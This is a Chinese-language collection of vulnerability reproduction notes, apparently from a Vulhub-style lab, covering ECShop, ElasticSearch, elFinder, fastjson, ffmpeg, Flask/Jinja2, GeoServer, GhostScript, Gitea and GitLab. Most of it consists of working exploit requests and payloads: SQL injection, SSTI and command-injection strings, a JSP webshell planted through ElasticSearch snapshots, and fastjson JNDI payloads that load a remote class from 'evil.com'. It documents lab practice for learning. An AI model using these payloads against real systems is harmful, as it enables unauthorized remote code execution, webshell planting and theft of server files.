echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

生成的POC，放在Referer里发送：

GET /user.php?act=login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

2.x的执行结果

3.x的执行结果：

ElasticSearch 命令执行漏洞（CVE-2014-3120）测试环境

jre版本：openjdk:8-jre

elasticsearch版本：v1.1.1

原理

相关文档：http://bouk.co/blog/elasticsearch-rce/ 、 https://www.t00ls.net/viewthread.php?tid=29408

老版本ElasticSearch支持传入动态脚本（MVEL）来执行一些复杂的操作，而MVEL可执行Java代码，而且没有沙盒，所以我们可以直接执行任意代码。

MVEL执行命令的代码如下：

import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();

漏洞复现

将Java代码放入json中：

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
  }

首先，该漏洞需要es中至少存在一条数据，所以我们需要先创建一条数据：

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

然后，执行任意代码：

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

结果如图：

ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞（CVE-2015-1427）测试环境

jre版本：openjdk:8-jre

elasticsearch版本：v1.4.2

原理

参考文章：

• http://cb.drops.wiki/drops/papers-5107.html
• http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
• https://github.com/XiphosResearch/exploits
• http://cb.drops.wiki/drops/papers-5142.html

CVE-2014-3120后，ElasticSearch默认的动态脚本语言换成了Groovy，并增加了沙盒，但默认仍然支持直接执行动态语言。本漏洞：1.是一个沙盒绕过； 2.是一个Goovy代码执行漏洞。

Groovy语言“沙盒”

ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本，但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法：

1. 既然对执行Java代码有沙盒，lupin的方法是想办法绕过沙盒，比如使用Java反射
2. Groovy原本也是一门语言，于是tang3另辟蹊径，使用Groovy语言支持的方法，来直接执行命令，无需使用Java语言

所以，根据这两种执行漏洞的思路，我们可以获得两个不同的POC。

Java沙盒绕过法：

java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()

Goovy直接执行命令法：

def command='id';def res=command.execute().text;res

漏洞复现

由于查询时至少要求es中有一条数据，所以发送如下数据包，增加一个数据：

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "test"
}

然后发送包含payload的数据包，执行任意命令：

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

ElasticSearch 目录穿越漏洞（CVE-2015-3337）测试环境

jre版本：openjdk:8-jre

elasticsearch版本：v1.4.4

影响版本：1.4.5以下/1.5.2以下

原理

在安装了具有“site”功能的插件以后，插件目录使用../即可向上跳转，导致目录穿越漏洞，可读取任意文件。没有安装任意插件的elasticsearch不受影响。

漏洞复现

测试环境默认安装了一个插件：elasticsearch-head，主页在此：https://github.com/mobz/elasticsearch-head

访问http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd读取任意文件（不要在浏览器访问）：

ElasticSearch 目录穿越漏洞（CVE-2015-5531）

jre版本：openjdk:8-jre

elasticsearch版本：v1.6.0

影响版本：1.6.1以下

原理

参考文章

• https://www.exploit-db.com/exploits/38383/
• http://www.freebuf.com/vuls/99942.html

说明：

elasticsearch 1.5.1及以前，无需任何配置即可触发该漏洞。之后的新版，配置文件elasticsearch.yml中必须存在path.repo，该配置值为一个目录，且该目录必须可写，等于限制了备份仓库的根位置。不配置该值，默认不启动这个功能。

漏洞复现

1. 新建一个仓库

PUT /_snapshot/test HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test" 
    }
}

2. 创建一个快照

PUT /_snapshot/test2 HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{
    "type": "fs",
    "settings": {
        "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 
    }
}

3. 目录穿越读取任意文件

访问 http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

如上图，在错误信息中包含文件内容（编码后），对其进行解码即可获得文件：

Elasticsearch写入webshell漏洞（WooYun-2015-110216）

参考文章： http://cb.drops.wiki/bugs/wooyun-2015-0110216.html

原理

ElasticSearch具有备份数据的功能，用户可以传入一个路径，让其将数据备份到该路径下，且文件名和后缀都可控。

所以，如果同文件系统下还跑着其他服务，如Tomcat、PHP等，我们可以利用ElasticSearch的备份功能写入一个webshell。

和CVE-2015-5531类似，该漏洞和备份仓库有关。在elasticsearch1.5.1以后，其将备份仓库的根路径限制在配置文件的配置项path.repo中，而且如果管理员不配置该选项，则默认不能使用该功能。即使管理员配置了该选项，web路径如果不在该目录下，也无法写入webshell。所以该漏洞影响的ElasticSearch版本是1.5.x以前。

漏洞复现

首先创建一个恶意索引文档：

curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'

再创建一个恶意的存储库，其中location的值即为我要写入的路径。

园长：这个Repositories的路径比较有意思，因为他可以写到可以访问到的任意地方，并且如果这个路径不存在的话会自动创建。那也就是说你可以通过文件访问协议创建任意的文件夹。这里我把这个路径指向到了tomcat的web部署目录，因为只要在这个文件夹创建目录Tomcat就会自动创建一个新的应用(文件名为wwwroot的话创建出来的应用名称就是wwwroot了)。

curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{
     "type": "fs",
     "settings": {
          "location": "/usr/local/tomcat/webapps/wwwroot/",
          "compress": false
     }
}'

存储库验证并创建:

curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{
     "indices": "yz.jsp",
     "ignore_unavailable": "true",
     "include_global_state": false
}'

完成！

访问http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp，这就是我们写入的webshell。

该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串，如：http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success，我们再访问/wwwroot/test.jsp就能看到success了：

Electron WebPreferences 远程命令执行漏洞（CVE-2018-15685）（未完成）

Electron是由Github开发，用HTML，CSS和JavaScript来构建跨平台桌面应用程序的一个开源库。 Electron通过将Chromium和Node.js合并到同一个运行时环境中，并将其打包为Mac，Windows和Linux系统下的应用来实现这一目的。

Electron在设置了nodeIntegration=false的情况下（默认），页面中的JavaScript无法访问node.js的内置库。CVE-2018-15685绕过了该限制，导致在用户可执行JavaScript的情况下（如访问第三方页面或APP存在XSS漏洞时），能够执行任意命令。

参考链接：

• https://electronjs.org/blog/web-preferences-fix
• https://www.contrastsecurity.com/security-influencers/cve-2018-15685

报错 .sh无法执行

electron 远程命令执行漏洞（CVE-2018-1000006）（未完成）

同上

elFinder ZIP 参数与任意命令注入（CVE-2021-32682）

elFinder是一个基于PHP、Jquery的开源文件管理系统。

在elFinder 2.1.48及以前的版本中，存在一处参数注入漏洞。攻击者可以利用这个漏洞在目标服务器上执行任意命令，即使是最小化安装的elFinder。

这个漏洞的原因除了参数注入外，还有默认情况下的未授权访问，因此我们可以对elFinder增加权限校验，避免任意用户操作服务器上的文件，进而避免被执行任意命令。当然，升级版本到2.1.49及以上也是必要的。

参考链接：

• https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
• https://packetstormsecurity.com/files/164173/elfinder_archive_cmd_injection.rb.txt
• https://xz.aliyun.com/t/10739

漏洞复现

复现这个漏洞首先需要用elFinder提供的功能，创建两个文件。

先创建一个普通的文本文件1.txt：

然后右键这个文件，对其进行打包，打包后的文件命名为2.zip：

最后我们获得1.txt和2.zip两个文件：

然后，发送如下数据包来执行任意命令：

GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://localhost.lan:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

这个数据包中，你可以看到三个重要的参数：

• name， 值为-TvTT=id>shell.php # a.zip，你可以修改id>shell.php为任意你想执行的命令
• targets[0]， 值为l1_MS50eHQ，l1意思是第一个文件系统（默认值，不用修改），MS50eHQ是1.txt的base64编码
• targets[1]， 值为l1_Mi56aXA，l1意思是第一个文件系统（默认值，不用修改），Mi56aXA是2.zip的base64编码

虽然这个数据包发送后会返回错误信息，但实际上其中指定的命令已经被成功执行

可以访问http://your-ip:8080/files/shell.php查看执行的结果：

fastjson 1.2.24 反序列化导致任意命令执行漏洞

fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。

参考资料：

• https://www.freebuf.com/vuls/208339.html
• http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/

漏洞复现

因为目标环境是Java 8u102，没有com.sun.jndi.rmi.object.trustURLCodebase的限制，我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链，借助JNDI注入来执行命令。

首先编译并上传命令执行代码，如http://evil.com/TouchFile.class：

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

然后我们借助marshalsec项目，启动一个RMI服务器，监听9999端口，并制定加载远程类TouchFile.class：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999

向靶场服务器发送Payload，带上RMI的地址：

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    }
}

可见，命令touch /tmp/success已成功执行：

我参考了这个教程

Fastjson 1.2.47 远程命令执行漏洞

Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。

参考链接：

• https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
• https://www.freebuf.com/vuls/208339.html

漏洞复现

和上面那个过程完全一样啊 就不再搞一遍了

目标环境是openjdk:8u102，这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制，我们可以简单利用RMI进行命令执行。

首先编译并上传命令执行代码，如http://evil.com/TouchFile.class：

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

然后我们借助marshalsec项目，启动一个RMI服务器，监听9999端口，并制定加载远程类TouchFile.class：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999

向靶场服务器发送Payload：

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    }
}

可见，命令touch /tmp/success已成功执行：

ffmpeg 任意文件读取漏洞/SSRF漏洞 （CVE-2016-1897/CVE-2016-1898）

运行环境：

docker compose build
docker compose up -d

原理

• http://xdxd.love/2016/01/18/ffmpeg-SSRF%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
• http://blog.neargle.com/SecNewsBak/drops/CVE-2016-1897.8%20-%20FFMpeg%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html
• http://habrahabr.ru/company/mailru/blog/274855/

测试过程

详见参考文章，不再赘述。

漏洞复现

三个链接死了两个 这里用的是[这个教程][https://www.freebuf.com/articles/web/258320.html]

首先，我们需要在 web 服务器上创建一个 back.txt，文件内容是 m3u8 的格式，其中不包含文件结束符。
其次，我们再创建一个恶意的 m3u8 文件，文件内容通过 concat 拼接本地文件/etc/passwd。
最后，我们上传这个恶意的 m3u8 文件。
back.txt：

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://your_ip:9999/?

upload.m3u8:

#EXTM3U
#EXT-X-TARGETDURATION:6
#EXTINF:10.0,
concat:http://your_ip/back.txt|file:///etc/passwd
#EXT-X-ENDLIST

Tip: 以上的文件需要使用记事本编辑保存，选择默认 utf-8 格式。使用vim来编译可能会导致复现失败。

使用python来搭建一个简易的web，将back.txt部署到web上。

python2 -m SimpleHTTPServer 8888
或
python3 -m http.server 8888

上传恶意m3u8文件，并监听9999端口

感谢师傅不断测试扫坑：https://www.freebuf.com/articles/web/258320.html.
以下均来自上面师傅的文章
在不断测试的过程中，最终发现，与 URL 长度，m3u8 请求 URL 都无关系，也没有 32 字节的限制。实际上 concat 连接 URL 时是不能包含换行符的。/etc/passwd 文件存储过程中换行符 \n 是占一个字符的，所以无论是通过 file 协议，还是 subfile 切片，只要是读取到 \n 则中断，后面的内容无法输出。

ffmpeg 任意文件读取漏洞环境

参考资料：

• http://bobao.360.cn/learning/detail/4032.html
• https://hackerone.com/reports/242831
• https://github.com/neex/ffmpeg-avi-m3u-xbin

漏洞复现

漏洞原理不再赘述，直接下载exp，并生成payload：

# 下载exp
git clone https://github.com/neex/ffmpeg-avi-m3u-xbin
cd ffmpeg-avi-m3u-xbin

# 生成payload
./gen_xbin_avi.py file:///etc/passwd exp.avi

生成exp.avi，在http://your-ip:8080/上传。后端将会将你上传的视频用ffmpeg转码后显示，转码时因为ffmpeg的任意文件读取漏洞，可将文件信息读取到视频中：

你也可以执行docker compose exec web bash进入本环境内部，测试ffmpeg。

注：没法直接播放的话可以右键保存下来看

Flask（Jinja2） 服务端模板注入漏洞

原理

参考文章：

• https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
• http://rickgray.me/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates

漏洞复现

编译及运行测试环境：

docker compose build
docker compose up -d

访问http://your-ip/?name={{233*233}}，得到54289，说明SSTI漏洞存在。

获取eval函数并执行任意python代码的POC：

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

访问http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D，得到执行结果：

flink的俩漏洞readme没人翻译做个鸡毛啊

GeoServer OGC Filter SQL注入漏洞（CVE-2023-25157）

GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。

在版本2.22.1和2.21.4及以前，多个OGC表达式中均存在SQL注入漏洞。

参考链接：

• https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158
• https://github.com/advisories/GHSA-7g5f-wrx8-5ccf

漏洞复现

在利用漏洞前，需要目标服务器中存在类型是PostGIS的数据空间（datastore）和工作空间（workspace）。在Vulhub中，已经包含满足条件的工作空间，其信息如下：

• Workspace name: vulhub
• Data store name: pg
• Feature type (table) name: example
• One of attribute from feature type: name

利用这些已知参数，发送如下URL即可触发SQL注入漏洞：

http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true

可见，已经使用SQL注入获取到了目标服务器PostgreSQL的版本。

GeoServer 属性名表达式前台代码执行漏洞（CVE-2024-36401）

GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。

在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。

参考链接：

• https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
• https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w
• https://tttang.com/archive/1771/
• https://github.com/Warxim/CVE-2022-41852

漏洞复现

在官方漏洞通告中提到可以找到漏洞相关的WFS方法：

No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests.

比如，我这里使用GetPropertyValue来执行xpath表达式。参考官方文档，我构造了两个POC。基于GET方法的POC：

GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0

基于POST方法的POC：

POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>

熟悉的java.lang.ClassCastException错误，说明命令已执行成功。

进入容器可见，touch /tmp/success1与touch /tmp/success2均已成功执行。

值得注意的是，typeNames必须存在，我们可以在Web页面中找到当前服务器中的所有Types：

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞：

• http://seclists.org/oss-sec/2018/q3/142
• https://bugs.chromium.org/p/project-zero/issues/detail?id=1640

GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。

漏洞复现

上传poc.png，将执行命令id > /tmp/success && cat /tmp/success。此时进入容器docker compose exec web bash，将可以看到/tmp/success已被创建：

可见，id命令已被成功运行。

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-19475）

2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475，可以通过一个恶意图片绕过GhostScript的沙盒，进而在9.26以前版本的gs中执行任意命令。

参考链接：

• https://blog.semmle.com/ghostscript-CVE-2018-19475/
• https://bugs.ghostscript.com/show_bug.cgi?id=700153

漏洞复现

将POC作为图片上传，执行命令id > /tmp/success && cat /tmp/success：

POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279

------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--

命令已成功执行：

当然，真实环境下通常无法直接回显漏洞执行结果，你需要使用带外攻击的方式来检测漏洞。

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2019-6116）

2019年1月23日晚，Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞，该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。该漏洞可以直接绕过 ghostscript 的安全沙箱，导致攻击者可以执行任意命令/读取任意文件。

GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。

参考链接：

• https://bugs.chromium.org/p/project-zero/issues/detail?id=1729&desc=2
• https://www.anquanke.com/post/id/170255

漏洞复现

作者给出了POC，上传这个文件，即可执行id > /tmp/success：

Gitea 1.4.0 目录穿越导致命令执行漏洞

Gitea是从gogs衍生出的一个开源项目，是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误，导致未授权用户可以穿越目录，读写任意文件，最终导致执行任意命令。

参考链接：

• https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html
• https://www.leavesongs.com/PENETRATION/gitea-remote-command-execution.html

漏洞复现

安装完成后，创建一个公开的仓库，随便添加点文件进去（比如使用选定的文件和模板初始化仓库）：

然后，需要执行一次docker compose restart重启gitea服务。（原因详见第二个参考链接）

由于漏洞链整体利用比较复杂，我们只复现文件读取部分，剩余利用方法详见第二个参考链接。

打开gitea，找到刚才创建的公开项目，如vulhub/repo，发送如下数据包，添加一个Git LFS对象：

POST /vulhub/repo.git/info/lfs/objects HTTP/1.1
Host: your-ip:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 151

{
    "Oid": "....../../../etc/passwd",
    "Size": 1000000,
    "User" : "a",
    "Password" : "a",
    "Repo" : "a",
    "Authorization" : "a"
}

然后，访问http://your-ip:3000/vulhub/repo.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth，即可看到/etc/passwd已被成功读取：

GitLab 任意文件读取漏洞（CVE-2016-9086）

GitLab是一款Ruby开发的Git项目管理平台。在8.9版本后添加的“导出、导入项目”功能，因为没有处理好压缩包中的软连接，已登录用户可以利用这个功能读取服务器上的任意文件。

参考链接：

• https://about.gitlab.com/releases/2016/11/02/cve-2016-9086-patches/
• https://hackerone.com/reports/178152
• http://paper.seebug.org/104/

环境运行后，访问http://your-ip:8080即可查看GitLab主页，其ssh端口为10022，默认管理员账号、密码是root、vulhub123456。

注意，请使用2G及以上内存的VPS或虚拟机运行该环境，实测1G内存的机器无法正常运行GitLab（运行后502错误）。

漏洞复现

注册并登录用户，新建一个项目，点击GitLab export：

在导入页面，将test.tar.gz上传，将会读取到/etc/passwd文件内容：

GitLab 远程命令执行漏洞（CVE-2021-22205）

GitLab是一款Ruby开发的Git项目管理平台。在11.9以后的GitLab中，因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响，攻击者可以通过一个未授权的接口上传一张恶意构造的图片，进而在GitLab服务器上执行任意命令。

参考链接：

• https://hackerone.com/reports/1154542
• https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html
• https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
• https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml

漏洞复现

GitLab的/uploads/user接口可以上传图片且无需认证，利用poc.py脚本来测试这个漏洞：

>python poc.py http://your-ip:8080 "touch /tmp/success"

进入容器内，可见touch /tmp/success已成功执行：

gitlist 0.6.0 远程命令执行漏洞（CVE-2018-1000533）（未完成）

gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本及以前，存在一处命令参数注入问题，可以导致远程命令执行漏洞。

参考链接：

• https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
• https://www.exploit-db.com/exploits/44548
• https://www.leavesongs.com/PENETRATION/escapeshellarg-and-parameter-injection.html

创建环境显示502

GlassFish 任意文件读取漏洞

原理

参考链接：

• https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
• https://www.leavesongs.com/PENETRATION/utf-8-overlong-encoding.html

GlassFish在解码URL时，没有考虑UTF-8 Overlong Encoding攻击，导致将%c0%ae解析为ASCCII字符的.（点）。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转，达到目录穿越、任意文件读取的效果。

漏洞复现

环境运行后，访问http://your-ip:8080和http://your-ip:4848即可查看web页面。其中，8080端口是网站内容，4848端口是GlassFish管理中心。

